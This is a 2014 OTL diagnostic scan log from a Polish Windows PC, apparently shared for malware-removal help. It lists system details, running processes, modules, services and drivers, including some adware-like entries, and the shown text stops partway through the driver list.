OTL logfile created on: 2014-09-10 18:53:48 - Run 2 OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\Edyta\Downloads 64bit- An unknown product (Version = 6.2.9200) - Type = NTWorkstation Internet Explorer (Version = 9.11.9600.17278) Locale: 00000415 | Country: Poland | Language: PLK | Date Format: yyyy-MM-dd 7,89 Gb Total Physical Memory | 5,87 Gb Available Physical Memory | 74,42% Memory free 31,89 Gb Paging File | 29,90 Gb Available in Paging File | 93,77% Paging File free Paging file location(s): ?:\pagefile.sys [binary data] %SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files (x86) Drive C: | 905,18 Gb Total Space | 438,63 Gb Free Space | 48,46% Space Free | Partition Type: NTFS Computer Name: EDYTKA | User Name: Edyta | Logged in as Administrator. Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days [color=#E56717]========== Processes (SafeList) ==========[/color] PRC - [2014-09-10 18:48:33 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Edyta\Downloads\OTL(1).exe PRC - [2014-09-09 20:43:29 | 001,870,000 | ---- | M] (Adobe Systems, Inc.) -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_15_0_0_152.exe PRC - [2014-07-30 20:05:51 | 000,275,568 | ---- | M] (Mozilla Corporation) -- C:\Program Files (x86)\Mozilla Firefox\firefox.exe PRC - [2014-06-12 08:53:30 | 000,761,968 | ---- | M] (Cherished Technololgy LIMITED) -- C:\ProgramData\IePluginServices\PluginService.exe PRC - [2014-06-11 07:50:12 | 000,540,304 | ---- | M] (Cherished Technololgy LIMITED) -- C:\ProgramData\WPM\wprotectmanager.exe PRC - [2014-04-04 16:38:40 | 003,020,632 | ---- | M] (Samsung Electronics CO., LTD.) -- C:\ProgramData\Samsung\SW Update Service\SWMAgent.exe PRC - [2014-03-18 17:28:02 | 000,514,560 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\WWAHost.exe PRC - [2014-02-26 16:18:11 | 000,425,104 | ---- | M] (Taiwan Shui Mu Chih Ching Technology Limited.) -- C:\Program Files (x86)\WinZipper\winzipersvc.exe PRC - [2014-01-30 13:51:31 | 001,472,312 | ---- | M] (ABBYY Production LLC.) -- C:\Program Files (x86)\ABBYY FineReader 12\Bonus.ScreenshotReader.exe PRC - [2014-01-29 13:20:52 | 001,593,152 | ---- | M] (Samsung Electronics CO., LTD.) -- C:\Program Files (x86)\Samsung\Settings\CmdServer\EasyLauncher.exe PRC - [2014-01-29 13:20:50 | 000,084,800 | ---- | M] () -- C:\Program Files (x86)\Samsung\Settings\CmdServer\EasySettingsCmdServer.exe PRC - [2014-01-29 13:20:42 | 002,623,296 | ---- | M] (Samsung Electronics CO., LTD.) -- C:\Program Files (x86)\Samsung\Settings\sSettings.exe PRC - [2014-01-23 13:40:35 | 000,925,904 | ---- | M] (ABBYY Production LLC) -- C:\Program Files (x86)\ABBYY FineReader 12\NetworkLicenseServer.exe PRC - [2013-12-18 11:42:32 | 000,065,432 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe PRC - [2013-09-16 12:20:16 | 000,390,616 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe PRC - [2013-09-16 12:20:12 | 000,131,544 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe PRC - [2013-09-16 12:20:10 | 000,169,432 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe PRC - [2013-08-26 14:18:50 | 001,157,496 | ---- | M] (Motorola Solutions, Inc.) -- C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe PRC - [2013-08-26 14:18:28 | 001,137,016 | ---- | M] (Motorola Solutions, Inc.) -- C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe PRC - [2013-08-07 14:24:00 | 000,287,592 | ---- | M] (Intel Corporation) -- C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe PRC - [2013-08-07 14:24:00 | 000,015,720 | ---- | M] (Intel Corporation) -- C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe PRC - [2013-05-21 06:44:22 | 000,144,368 | R--- | M] (Symantec Corporation) -- C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\ccsvchst.exe PRC - [2013-03-28 15:55:58 | 001,058,880 | ---- | M] (SEIKO EPSON CORPORATION) -- C:\Program Files (x86)\EPSON Software\Event Manager\EEventManager.exe PRC - [2012-08-15 13:41:26 | 000,097,392 | ---- | M] (CyberLink Corp.) -- C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe PRC - [2012-04-24 14:37:56 | 000,169,752 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Integrated Clock Controller Service\ICCProxy.exe [color=#E56717]========== Modules (No Company Name) ==========[/color] MOD - [2014-09-10 18:15:05 | 007,785,472 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Xml\462e6667cb4ef74abec9524d96c4d7d5\System.Xml.ni.dll MOD - [2014-09-10 18:15:01 | 001,874,432 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Xaml\dd08601ab40a3c0743ee8d7b4350debe\System.Xaml.ni.dll MOD - [2014-09-10 18:15:00 | 012,856,832 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\cc272fa4bc8ae7c468e3c75a57ae3c72\System.Windows.Forms.ni.dll MOD - [2014-09-10 18:14:51 | 019,567,616 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\528be8efca0c6b6c9ce63f3664c80443\System.ServiceModel.ni.dll MOD - [2014-09-10 18:14:39 | 002,803,200 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\cf112546e5e77b821db19d8b958cfeee\System.Runtime.Serialization.ni.dll MOD - [2014-09-10 18:14:35 | 001,635,328 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Drawing\9e99d85dfa5a3de8e34fe912acf82021\System.Drawing.ni.dll MOD - [2014-09-10 18:14:30 | 000,968,192 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Configuration\04d455ea050b547ca661a16509fe4638\System.Configuration.ni.dll MOD - [2014-09-10 18:14:07 | 006,951,424 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Core\5e8ea4bc2ddce0edd65f5c68b7241c06\System.Core.ni.dll MOD - [2014-09-10 18:14:02 | 010,003,456 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System\3028925cf331e81d2b55093a3f131bd5\System.ni.dll MOD - [2014-09-09 20:43:28 | 016,825,520 | ---- | M] () -- C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_152.dll MOD - [2014-07-30 20:05:40 | 003,800,688 | ---- | M] () -- C:\Program Files (x86)\Mozilla Firefox\mozjs.dll MOD - [2014-03-18 17:27:55 | 017,395,376 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\mscorlib\c90ef9a73ea0044641d31b19023aad61\mscorlib.ni.dll MOD - [2014-01-29 13:20:54 | 000,109,888 | ---- | M] () -- C:\Program Files (x86)\Samsung\Settings\EasySettingsBase.dll MOD - [2014-01-29 13:20:48 | 000,211,064 | ---- | M] () -- C:\Program Files (x86)\Samsung\Settings\CmdServer\WinCRT.dll MOD - [2014-01-29 13:20:42 | 000,059,712 | ---- | M] () -- C:\Program Files (x86)\Samsung\Settings\EasyMovieEnhancer.dll MOD - [2014-01-29 13:20:38 | 000,102,720 | ---- | M] () -- C:\Program Files (x86)\Samsung\Settings\EasySettingsCmdClient.dll MOD - [2014-01-29 13:20:36 | 000,025,920 | ---- | M] () -- C:\Program Files (x86)\Samsung\Settings\EasySettingsAPI.dll MOD - [2013-09-11 22:04:40 | 000,686,408 | ---- | M] () -- c:\Program Files (x86)\ABBYY FineReader 12\DL100JP2KLib.dll MOD - [2012-05-30 08:51:08 | 000,699,280 | R--- | M] () -- C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\wincfi39.dll [color=#E56717]========== Services (SafeList) ==========[/color] SRV:[b]64bit:[/b] - [2014-09-10 14:27:51 | 000,111,616 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService) SRV:[b]64bit:[/b] - [2014-08-01 00:12:28 | 002,369,720 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe -- (ClickToRunSvc) SRV:[b]64bit:[/b] - [2014-05-16 19:54:32 | 001,306,624 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AppXDeploymentServer.dll -- (AppXSvc) SRV:[b]64bit:[/b] - [2014-05-16 19:54:32 | 000,834,560 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\netlogon.dll -- (Netlogon) SRV:[b]64bit:[/b] - [2014-05-16 19:51:58 | 000,347,880 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Program Files\Windows Defender\NisSrv.exe -- (WdNisSvc) SRV:[b]64bit:[/b] - [2014-05-16 19:51:58 | 000,023,824 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MsMpEng.exe -- (WinDefend) SRV:[b]64bit:[/b] - [2014-05-16 19:51:23 | 001,584,128 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\workfolderssvc.dll -- (workfolderssvc) SRV:[b]64bit:[/b] - [2014-05-16 19:51:20 | 000,491,520 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\GeofenceMonitorService.dll -- (lfsvc) SRV:[b]64bit:[/b] - [2014-05-16 19:51:20 | 000,201,216 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\AudioEndpointBuilder.dll -- (AudioEndpointBuilder) SRV:[b]64bit:[/b] - [2014-03-18 17:27:40 | 000,710,656 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\lsm.dll -- (LSM) SRV:[b]64bit:[/b] - [2014-03-18 17:27:40 | 000,530,944 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AppReadiness.dll -- (AppReadiness) SRV:[b]64bit:[/b] - [2014-03-18 17:27:35 | 000,366,080 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wcmsvc.dll -- (Wcmsvc) SRV:[b]64bit:[/b] - [2014-03-18 17:27:33 | 003,394,384 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\WSService.dll -- (WSService) SRV:[b]64bit:[/b] - [2014-03-18 17:27:32 | 001,576,960 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wlidsvc.dll -- (wlidsvc) SRV:[b]64bit:[/b] - [2014-03-18 17:27:30 | 000,399,872 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\das.dll -- (DeviceAssociationService) SRV:[b]64bit:[/b] - [2014-03-18 17:27:30 | 000,269,824 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\bisrv.dll -- (BrokerInfrastructure) SRV:[b]64bit:[/b] - [2014-03-18 17:27:28 | 000,282,112 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\SystemEventsBrokerServer.dll -- (SystemEventsBroker) SRV:[b]64bit:[/b] - [2013-08-31 22:57:56 | 000,239,616 | ---- | M] (AMD) [Auto | Running] -- C:\Windows\SysNative\atiesrxx.exe -- (AMD External Events Utility) SRV:[b]64bit:[/b] - [2013-08-28 17:24:04 | 003,378,416 | ---- | M] (Intel® Corporation) [Auto | Running] -- C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe -- (ZeroConfigService) SRV:[b]64bit:[/b] - [2013-08-28 17:23:48 | 000,273,136 | ---- | M] () [On_Demand | Stopped] -- C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe -- (MyWiFiDHCPDNS) SRV:[b]64bit:[/b] - [2013-08-28 17:23:40 | 000,626,416 | ---- | M] (Intel(R) Corporation) [Auto | Running] -- C:\Program Files\Intel\WiFi\bin\EvtEng.exe -- (EvtEng) SRV:[b]64bit:[/b] - [2013-08-28 17:23:20 | 000,149,744 | ---- | M] (Intel(R) Corporation) [Auto | Running] -- C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe -- (RegSrvc) SRV:[b]64bit:[/b] - [2013-08-27 14:32:30 | 000,828,376 | ---- | M] (Intel(R) Corporation) [On_Demand | Stopped] -- C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe -- (Intel(R) SRV:[b]64bit:[/b] - [2013-08-27 14:32:14 | 000,747,520 | ---- | M] (Intel(R) Corporation) [Auto | Running] -- C:\Program Files\Intel\iCLS Client\HeciServer.exe -- (Intel(R) SRV:[b]64bit:[/b] - [2013-08-22 14:31:56 | 002,899,968 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\spool\drivers\x64\3\PrintConfig.dll -- (PrintNotify) SRV:[b]64bit:[/b] - [2013-08-22 13:32:02 | 000,024,576 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wephostsvc.dll -- (WEPHOSTSVC) SRV:[b]64bit:[/b] - [2013-08-22 13:31:43 | 000,040,448 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\efssvc.dll -- (EFS) SRV:[b]64bit:[/b] - [2013-08-22 13:22:45 | 000,066,048 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wiarpc.dll -- (WiaRpc) SRV:[b]64bit:[/b] - [2013-08-22 13:21:15 | 000,013,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\svsvc.dll -- (svsvc) SRV:[b]64bit:[/b] - [2013-08-22 13:16:57 | 000,118,272 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\fhsvc.dll -- (fhsvc) SRV:[b]64bit:[/b] - [2013-08-22 12:25:28 | 000,164,352 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\NcaSvc.dll -- (NcaSvc) SRV:[b]64bit:[/b] - [2013-08-22 12:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicvss) SRV:[b]64bit:[/b] - [2013-08-22 12:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmictimesync) SRV:[b]64bit:[/b] - [2013-08-22 12:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicshutdown) SRV:[b]64bit:[/b] - [2013-08-22 12:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicrdv) SRV:[b]64bit:[/b] - [2013-08-22 12:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmickvpexchange) SRV:[b]64bit:[/b] - [2013-08-22 12:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicheartbeat) SRV:[b]64bit:[/b] - [2013-08-22 12:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicguestinterface) SRV:[b]64bit:[/b] - [2013-08-22 12:02:47 | 000,013,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\smphost.dll -- (smphost) SRV:[b]64bit:[/b] - [2013-08-22 11:57:25 | 000,130,560 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\ScDeviceEnum.dll -- (ScDeviceEnum) SRV:[b]64bit:[/b] - [2013-08-22 11:54:59 | 000,059,392 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\keyiso.dll -- (KeyIso) SRV:[b]64bit:[/b] - [2013-08-22 11:50:59 | 000,245,760 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\TimeBrokerServer.dll -- (TimeBroker) SRV:[b]64bit:[/b] - [2013-08-22 11:50:00 | 000,525,312 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netprofmsvc.dll -- (netprofm) SRV:[b]64bit:[/b] - [2013-08-22 11:45:59 | 000,151,040 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\ncbservice.dll -- (NcbService) SRV:[b]64bit:[/b] - [2013-08-22 11:40:49 | 000,248,832 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\vaultsvc.dll -- (VaultSvc) SRV:[b]64bit:[/b] - [2013-08-22 11:31:03 | 000,201,728 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\DeviceSetupManager.dll -- (DsmSvc) SRV:[b]64bit:[/b] - [2013-08-22 11:15:54 | 000,073,728 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\NcdAutoSetup.dll -- (NcdAutoSetup) SRV:[b]64bit:[/b] - [2013-08-07 14:24:00 | 000,015,720 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe -- (IAStorDataMgrSvc) SRV:[b]64bit:[/b] - [2013-05-21 09:14:18 | 000,772,064 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files\Intel\BluetoothHS\BTHSAmpPalService.exe -- (AMPPALR3) SRV:[b]64bit:[/b] - [2012-09-12 19:07:06 | 000,135,984 | ---- | M] (Intel(R) Corporation) [Auto | Running] -- C:\Program Files\Intel\BluetoothHS\BTHSSecurityMgr.exe -- (BTHSSecurityMgr) SRV:[b]64bit:[/b] - [2012-05-17 00:00:00 | 000,144,560 | ---- | M] (Seiko Epson Corporation) [Auto | Running] -- C:\Windows\SysNative\escsvc64.exe -- (EpsonScanSvc) SRV - [2014-09-09 20:43:30 | 000,267,440 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc) SRV - [2014-07-30 20:05:50 | 000,119,408 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance) SRV - [2014-06-12 08:53:30 | 000,761,968 | ---- | M] (Cherished Technololgy LIMITED) [Auto | Running] -- C:\ProgramData\IePluginServices\PluginService.exe -- (IePluginServices) SRV - [2014-06-11 07:50:12 | 000,540,304 | ---- | M] (Cherished Technololgy LIMITED) [Auto | Running] -- C:\ProgramData\WPM\wprotectmanager.exe -- (Wpm) SRV - [2014-05-16 19:51:20 | 000,357,376 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\GeofenceMonitorService.dll -- (lfsvc) SRV - [2014-04-04 16:38:40 | 003,020,632 | ---- | M] (Samsung Electronics CO., LTD.) [Auto | Running] -- C:\ProgramData\Samsung\SW Update Service\SWMAgent.exe -- (SWUpdateService) SRV - [2014-02-26 16:18:11 | 000,425,104 | ---- | M] (Taiwan Shui Mu Chih Ching Technology Limited.) [Auto | Running] -- C:\Program Files (x86)\WinZipper\winzipersvc.exe -- (winzipersvc) SRV - [2014-01-29 13:20:52 | 001,593,152 | ---- | M] (Samsung Electronics CO., LTD.) [Auto | Running] -- C:\Program Files (x86)\Samsung\Settings\CmdServer\EasyLauncher.exe -- (Easy Launcher) SRV - [2014-01-23 13:40:35 | 000,925,904 | ---- | M] (ABBYY Production LLC) [Auto | Running] -- C:\Program Files (x86)\ABBYY FineReader 12\NetworkLicenseServer.exe -- (ABBYY.Licensing.FineReader.Professional.12.0) SRV - [2013-12-18 11:42:32 | 000,065,432 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice) SRV - [2013-12-05 11:22:54 | 000,279,024 | ---- | M] (Intel Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\IntelCpHeciSvc.exe -- (cphs) SRV - [2013-09-18 22:38:44 | 000,157,128 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Bluetooth\ibtrksrv.exe -- (Intel(R) SRV - [2013-09-16 12:20:16 | 000,390,616 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe -- (LMS) SRV - [2013-09-16 12:20:12 | 000,131,544 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe -- (Intel(R) SRV - [2013-09-16 12:20:10 | 000,169,432 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe -- (jhi_service) SRV - [2013-08-26 14:18:50 | 001,157,496 | ---- | M] (Motorola Solutions, Inc.) [Auto | Running] -- C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe -- (Bluetooth OBEX Service) SRV - [2013-08-26 14:18:28 | 001,137,016 | ---- | M] (Motorola Solutions, Inc.) [Auto | Running] -- C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe -- (Bluetooth Device Monitor) SRV - [2013-08-22 14:31:56 | 002,899,968 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\system32\spool\drivers\x64\3\PrintConfig.dll -- (PrintNotify) SRV - [2013-08-22 05:55:35 | 000,018,944 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\StorSvc.dll -- (StorSvc) SRV - [2013-08-22 04:53:34 | 000,011,776 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\smphost.dll -- (smphost) SRV - [2013-05-21 06:44:22 | 000,144,368 | R--- | M] (Symantec Corporation) [Auto | Running] -- C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\ccSvcHst.exe -- (NIS) SRV - [2012-08-15 04:44:50 | 003,943,104 | ---- | M] (Symantec Corporation) [Auto | Running] -- C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe -- (NOBU) SRV - [2012-04-24 14:37:56 | 000,169,752 | ---- | M] (Intel Corporation) [On_Demand | Running] -- C:\Program Files (x86)\Intel\Intel(R) Integrated Clock Controller Service\ICCProxy.exe -- (ICCS) [color=#E56717]========== Driver Services (SafeList) ==========[/color] DRV:[b]64bit:[/b] - [2014-05-31 12:07:07 | 000,467,800 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\USBHUB3.SYS -- (USBHUB3) DRV:[b]64bit:[/b] - [2014-05-16 19:54:33 | 000,157,016 | ---- | M] (Microsoft Corporation) [File_System | Boot | Running] -- C:\WINDOWS\SysNative\drivers\wof.sys -- (Wof) DRV:[b]64bit:[/b] - [2014-05-16 19:54:32 | 000,376,152 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\clfs.sys -- (CLFS) DRV:[b]64bit:[/b] - [2014-05-16 19:54:32 | 000,136,024 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\wfplwfs.sys -- (WFPLWFS) DRV:[b]64bit:[/b] - [2014-05-16 19:51:58 | 000,257,880 | ---- | M] (Microsoft Corporation) [File_System | Boot | Running] -- C:\Windows\SysNative\drivers\WdFilter.sys -- (WdFilter) DRV:[b]64bit:[/b] - [2014-05-16 19:51:58 | 000,123,224 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\WdNisDrv.sys -- (WdNisDrv) DRV:[b]64bit:[/b] - [2014-05-16 19:51:58 | 000,035,856 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\WdBoot.sys -- (WdBoot) DRV:[b]64bit:[/b] - [2014-05-16 19:51:20 | 000,384,856 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\spaceport.sys -- (spaceport) DRV:[b]64bit:[/b] - [2014-05-01 15:31:39 | 000,055,328 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\wpcfltr.sys -- (wpcfltr) DRV:[b]64bit:[/b] - [2014-03-18 17:27:34 | 000,924,504 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\WINDOWS\SysNative\drivers\refs.sys -- (ReFS) DRV:[b]64bit:[/b] - [2014-03-18 17:27:30 | 000,146,776 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SerCx2.sys -- (SerCx2) DRV:[b]64bit:[/b] - [2014-03-18 17:27:30 | 000,146,776 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\msgpioclx.sys -- (GPIOClx0101) DRV:[b]64bit:[/b] - [2014-03-18 17:27:20 | 000,175,960 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\VerifierExt.sys -- (VerifierExt) DRV:[b]64bit:[/b] - [2014-03-18 17:27:19 | 000,236,888 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\sdbus.sys -- (sdbus) DRV:[b]64bit:[/b] - [2014-03-18 17:27:19 | 000,226,304 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\BthLEEnum.sys -- (BthLEEnum) DRV:[b]64bit:[/b] - [2014-03-18 17:27:19 | 000,086,872 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\pdc.sys -- (pdc) DRV:[b]64bit:[/b] - [2014-03-18 17:27:19 | 000,079,192 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\sdstor.sys -- (sdstor) DRV:[b]64bit:[/b] - [2014-03-18 17:27:18 | 000,325,464 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\USBXHCI.SYS -- (USBXHCI) DRV:[b]64bit:[/b] - [2014-03-18 17:27:18 | 000,189,784 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\UCX01000.SYS -- (UCX01000) DRV:[b]64bit:[/b] - [2014-03-18 17:27:18 | 000,057,176 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\stornvme.sys -- (stornvme) DRV:[b]64bit:[/b] - [2014-03-18 17:27:18 | 000,039,768 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\intelpep.sys -- (intelpep) DRV:[b]64bit:[/b] - [2014-03-18 17:27:18 | 000,033,280 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\BasicRender.sys -- (BasicRender) DRV:[b]64bit:[/b] - [2014-03-18 17:10:11 | 000,027,488 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport) DRV:[b]64bit:[/b] - [2014-03-18 17:10:07 | 000,037,216 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\terminpt.sys -- (terminpt) DRV:[b]64bit:[/b] - [2013-12-27 01:30:20 | 000,038,296 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\intelaud.sys -- (intaud_WaveExtensible) DRV:[b]64bit:[/b] - [2013-12-13 10:23:16 | 000,036,096 | ---- | M] (Advanced Micro Devices, Inc.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdkmpfd.sys -- (amdkmpfd) DRV:[b]64bit:[/b] - [2013-11-29 00:55:46 | 000,449,496 | ---- | M] (Intel(R) Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\IntcDAud.sys -- (IntcDAud) DRV:[b]64bit:[/b] - [2013-11-29 00:51:06 | 004,209,152 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx) DRV:[b]64bit:[/b] - [2013-10-29 03:08:35 | 000,027,032 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- 